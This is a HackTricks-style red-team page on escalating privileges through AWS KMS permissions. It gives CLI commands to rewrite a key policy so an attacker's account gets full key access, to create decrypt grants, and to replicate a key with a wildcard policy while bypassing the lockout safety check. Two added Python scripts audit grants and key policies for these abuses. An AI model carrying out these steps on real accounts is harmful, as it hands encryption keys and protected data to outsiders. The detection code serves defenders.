AWS - KMS Privesc

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

KMS

For more information about KMS check:

AWS - KMS Enum

kms:ListKeys, kms:PutKeyPolicy, (kms:ListKeyPolicies, kms:GetKeyPolicy)

With these permissions it is possible to modify the access permissions of a key so that it can be used by a different account or even by anyone:

aws kms list-keys
aws kms list-key-policies --key-id <id> # Although only 1 max per key
aws kms get-key-policy --key-id <id> --policy-name <policy_name>
# AWS KMS keys can only have 1 policy, so you need to use the same name to overwrite the policy (the name is usually "default")
aws kms put-key-policy --key-id <id> --policy-name <policy_name> --policy file:///tmp/policy.json

policy.json:

{
  "Version": "2012-10-17",
  "Id": "key-consolepolicy-3",
  "Statement": [
    {
      "Sid": "Enable IAM User Permissions",
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::<origin_account>:root"
      },
      "Action": "kms:*",
      "Resource": "*"
    },
    {
      "Sid": "Allow all use",
      "Effect": "Allow",
      "Principal": {
        "AWS": "arn:aws:iam::<attackers_account>:root"
      },
      "Action": [ "kms:*" ],
      "Resource": "*"
    }
  ]
}

kms:CreateGrant

Allows a principal to use a KMS key:

aws kms create-grant \
--key-id 1234abcd-12ab-34cd-56ef-1234567890ab \
--grantee-principal arn:aws:iam::123456789012:user/exampleUser \
--operations Decrypt

Note that it can take a few minutes for KMS to allow the grantee to use the key after the grant is created. Once that time has passed, the principal can use the KMS key without specifying anything else. However, if the grant needs to be used immediately, use a grant token (see the following code). For more information read this.

# Use the grant token in a request
aws kms generate-data-key \
--key-id 1234abcd-12ab-34cd-56ef-1234567890ab \
--key-spec AES_256 \
--grant-tokens $token

Note that it is possible to list the grants of a key with:

aws kms list-grants --key-id <value>
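From the defender's side, the grants listed by the command above are the artefact a kms:CreateGrant abuse leaves behind. The following added example (not part of the original page) audits a `list-grants` JSON document and flags every grant whose grantee belongs to an account other than the key owner's, together with the operations it unlocks and whether an encryption-context constraint limits it. The sample output and the account ids in it are constructed, not taken from a real account.

```python
import json

# Constructed sample in the shape of `aws kms list-grants --key-id <value>` output
# (assumed ids; no real key or account). The key is owned by account 111111111111;
# the second grant names a principal from another account, which is exactly what
# a kms:CreateGrant abuse leaves behind.
LIST_GRANTS_OUTPUT = json.loads("""
{
  "Grants": [
    {
      "KeyId": "arn:aws:kms:us-east-1:111111111111:key/00000000-0000-0000-0000-000000000000",
      "GrantId": "grant-internal",
      "Name": "app-grant",
      "GranteePrincipal": "arn:aws:iam::111111111111:role/app-role",
      "IssuingAccount": "arn:aws:iam::111111111111:root",
      "Operations": ["Encrypt", "Decrypt"],
      "Constraints": {"EncryptionContextSubset": {"app": "billing"}}
    },
    {
      "KeyId": "arn:aws:kms:us-east-1:111111111111:key/00000000-0000-0000-0000-000000000000",
      "GrantId": "grant-external",
      "GranteePrincipal": "arn:aws:iam::222222222222:user/exampleUser",
      "IssuingAccount": "arn:aws:iam::111111111111:root",
      "Operations": ["Decrypt"]
    }
  ]
}
""")


def principal_account(principal: str):
    """Return the 12-digit account id embedded in an IAM/STS ARN, or None for
    anything that is not an account-scoped ARN (for example a service principal)."""
    parts = principal.split(":")
    if len(parts) >= 6 and parts[0] == "arn" and parts[4].isdigit():
        return parts[4]
    return None


def find_foreign_grants(list_grants_output: dict, key_owner_account: str) -> list:
    """Flag grants whose grantee lives outside the key owner's account.

    Each finding records the grant id, the grantee, the operations it unlocks
    and whether the grant is limited by an encryption-context constraint. A
    Decrypt grant with no constraint lets the grantee decrypt anything under the key."""
    findings = []
    for grant in list_grants_output.get("Grants", []):
        grantee = grant.get("GranteePrincipal", "")
        account = principal_account(grantee)
        if account is None or account == key_owner_account:
            continue  # same-account grant, or a service principal without an account
        findings.append({
            "GrantId": grant.get("GrantId"),
            "GranteePrincipal": grantee,
            "GranteeAccount": account,
            "Operations": sorted(grant.get("Operations", [])),
            "Constrained": bool(grant.get("Constraints")),
        })
    return findings


if __name__ == "__main__":
    # Usage: pipe real `aws kms list-grants` output through json.load instead of
    # the constructed sample, and pass the account id that owns the key.
    for finding in find_foreign_grants(LIST_GRANTS_OUTPUT, "111111111111"):
        print(json.dumps(finding))
```

Grants issued to service principals (whose grantee is not an account-scoped ARN) are skipped on purpose; the check is about principals in other accounts, which is the case the section above describes.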

kms:CreateKey, kms:ReplicateKey

With these permissions it is possible to replicate a multi-region KMS key into a different region with a different policy.

Therefore, an attacker could abuse this to escalate their access over the key and use it.

aws kms replicate-key --key-id mrk-c10357313a644d69b4b28b88523ef20c --replica-region eu-west-3 --bypass-policy-lockout-safety-check --policy file:///tmp/policy.yml

{
  "Version": "2012-10-17",
  "Id": "key-consolepolicy-3",
  "Statement": [
    {
      "Sid": "Enable IAM User Permissions",
      "Effect": "Allow",
      "Principal": {
        "AWS": "*"
      },
      "Action": "kms:*",
      "Resource": "*"
    }
  ]
}
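Both the kms:PutKeyPolicy section and the kms:ReplicateKey section above end with a key policy that trusts either a second account's root principal or every principal ("*"). The following added example (not part of the original page) is a small key-policy auditor a defender can run over `aws kms get-key-policy` output: it reports Allow statements whose principal is a wildcard or an account outside a trusted set, and downgrades a wildcard that is fenced by a Condition (such as the common `kms:CallerAccount` pattern) to "review" instead of "critical". The policies, account ids and CLI output below are constructed, modelled on the ones shown on this page.

```python
import json

TRUSTED_ACCOUNTS = {"111111111111"}  # assumed: the account that owns the key

# Constructed key policies (assumed account ids) modelled on the two policies
# shown on this page: the first adds a second account's root principal, the
# second opens the key to every principal ("*").
POLICY_FOREIGN_ACCOUNT = {
    "Version": "2012-10-17",
    "Id": "key-consolepolicy-3",
    "Statement": [
        {"Sid": "Enable IAM User Permissions", "Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::111111111111:root"},
         "Action": "kms:*", "Resource": "*"},
        {"Sid": "Allow all use", "Effect": "Allow",
         "Principal": {"AWS": "arn:aws:iam::222222222222:root"},
         "Action": ["kms:*"], "Resource": "*"},
    ],
}

POLICY_WILDCARD = {
    "Version": "2012-10-17",
    "Id": "key-consolepolicy-3",
    "Statement": [
        {"Sid": "Enable IAM User Permissions", "Effect": "Allow",
         "Principal": {"AWS": "*"}, "Action": "kms:*", "Resource": "*"},
    ],
}

# A wildcard principal limited by kms:CallerAccount is a common legitimate
# pattern; it is reported for review rather than as critical.
POLICY_SCOPED_WILDCARD = {
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "Scoped wildcard", "Effect": "Allow",
         "Principal": {"AWS": "*"}, "Action": "kms:Decrypt", "Resource": "*",
         "Condition": {"StringEquals": {"kms:CallerAccount": "111111111111"}}},
    ],
}

# `aws kms get-key-policy` returns {"Policy": "<policy document as a JSON string>"};
# this constructed value reproduces that wrapping.
CLI_OUTPUT = json.dumps({"Policy": json.dumps(POLICY_WILDCARD)})


def statement_principals(stmt: dict) -> list:
    """Normalise the Principal element ("*" or a map of lists/strings) to a flat list."""
    principal = stmt.get("Principal")
    if principal == "*":
        return ["*"]
    if isinstance(principal, dict):
        out = []
        for value in principal.values():  # "AWS", "Service", "Federated", ...
            out.extend(value if isinstance(value, list) else [value])
        return out
    return []


def principal_account(principal: str):
    """Account id of an account-scoped principal, "*" for a wildcard, None otherwise."""
    if principal == "*":
        return "*"
    parts = principal.split(":")
    if len(parts) >= 6 and parts[0] == "arn" and parts[4].isdigit():
        return parts[4]
    if principal.isdigit() and len(principal) == 12:  # bare account id form
        return principal
    return None  # service principals and similar: not an account


def find_risky_statements(policy: dict, trusted_accounts: set) -> list:
    """Report Allow statements that trust a wildcard or an untrusted account."""
    findings = []
    statements = policy.get("Statement", [])
    if isinstance(statements, dict):  # IAM allows a single statement object
        statements = [statements]
    for stmt in statements:
        if stmt.get("Effect") != "Allow":
            continue
        for principal in statement_principals(stmt):
            account = principal_account(principal)
            if account == "*":
                severity = "review" if stmt.get("Condition") else "critical"
            elif account is not None and account not in trusted_accounts:
                severity = "critical"
            else:
                continue
            findings.append({"Sid": stmt.get("Sid", ""), "Principal": principal, "Severity": severity})
    return findings


def audit_get_key_policy_output(raw_cli_output: str, trusted_accounts: set) -> list:
    """Unwrap the CLI's {"Policy": "<json string>"} envelope, then audit the document."""
    policy = json.loads(json.loads(raw_cli_output)["Policy"])
    return find_risky_statements(policy, trusted_accounts)


if __name__ == "__main__":
    for finding in audit_get_key_policy_output(CLI_OUTPUT, TRUSTED_ACCOUNTS):
        print(json.dumps(finding))
```

Run it across every key returned by `aws kms list-keys` and every region a multi-region key has been replicated to, since a replica created with `--bypass-policy-lockout-safety-check` carries its own policy and is not covered by auditing the primary key alone.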

kms:Decrypt

This permission allows using a key to decrypt some information. For more information check:

AWS - KMS Post Exploitation